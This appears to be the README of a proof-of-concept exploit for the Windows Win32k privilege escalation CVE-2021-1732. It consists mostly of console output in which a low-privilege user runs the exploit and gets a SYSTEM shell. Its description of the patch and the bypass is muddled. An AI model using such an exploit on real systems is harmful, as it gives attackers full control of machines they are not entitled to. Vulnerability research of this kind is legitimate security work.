Win32k Elevation of Privilege Vulnerability. The Win32k elevation of privilege vulnerability was fixed this month as part of the January 2022 Patch Tuesday, it is the result of a bypass for the previously CVE-2021-1732 flaw that allows anyone to gain admin privileges in Windows 10.
Build your own .exe
from source.
CVE-2021-1732.exe whoami
Microsoft Windows [Version 10.0.17763.107]
(c) Microsoft Corporation. All rights reserved.
C:\Users\lowpriv> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
JohnDo
The command completed successfully.
C:\Users\lowpriv> whoami
desktop-qiv0pbc\lowpriv
C:\temp>CVE-2021-1732.exe whoami
CreateWnd
Hwnd:000b014a qwfirstEntryDesktop=000001966C345110
BaseAddress:000001966C345000 RegionSize=:000000000001A000
Hwnd:00050406 qwfirstEntryDesktop=000001966C3431C0
BaseAddress:000001966C343000 RegionSize=:000000000001C000
Hwnd:000903b2 qwfirstEntryDesktop=000001966C342A20
BaseAddress:000001966C342000 RegionSize=:000000000001D000
Hwnd:000300d8 qwfirstEntryDesktop=000001966C342B70
BaseAddress:000001966C342000 RegionSize=:000000000001D000
Hwnd:0013016c qwfirstEntryDesktop=000001966C341B90
BaseAddress:000001966C341000 RegionSize=:000000000001E000
Hwnd:00050414 qwfirstEntryDesktop=000001966C341CE0
BaseAddress:000001966C341000 RegionSize=:000000000001E000
Hwnd:0005017c qwfirstEntryDesktop=000001966C341E30
BaseAddress:000001966C341000 RegionSize=:000000000001E000
Hwnd:000502da qwfirstEntryDesktop=000001966C356830
BaseAddress:000001966C356000 RegionSize=:0000000000009000
Hwnd:00020384 qwfirstEntryDesktop=000001966C356980
BaseAddress:000001966C356000 RegionSize=:0000000000009000
Hwnd:000203ac qwfirstEntryDesktop=000001966C356AD0
BaseAddress:000001966C356000 RegionSize=:0000000000009000
Min BaseAddress:000001966C341000 RegionSize=:000000000001E000
realMagicHwnd=00000000000303AC
Free ExtraBytes:000000000000124D
set ExtraData == 00000000000431C0
Free ExtraBytes:000000000000124D
dwRet=000000000000FA90
tagWndMin_offset_0x128=000000000000FA90
g_qwvuln=FFFFB73700826960
qwFrist read=FFFFB73700831E70
qwSecond read=FFFFC98914160810
qwSecond read=FFFFB73701A00000
qwFourth read=FFFFB737017F8010
qwFifth read=FFFFC989207F2080
qwSixth read=FFFFC98921421300
[*] Trying to execute whoami as SYSTEM
[+] ProcessCreated with pid 11296!
===============================
nt authority\system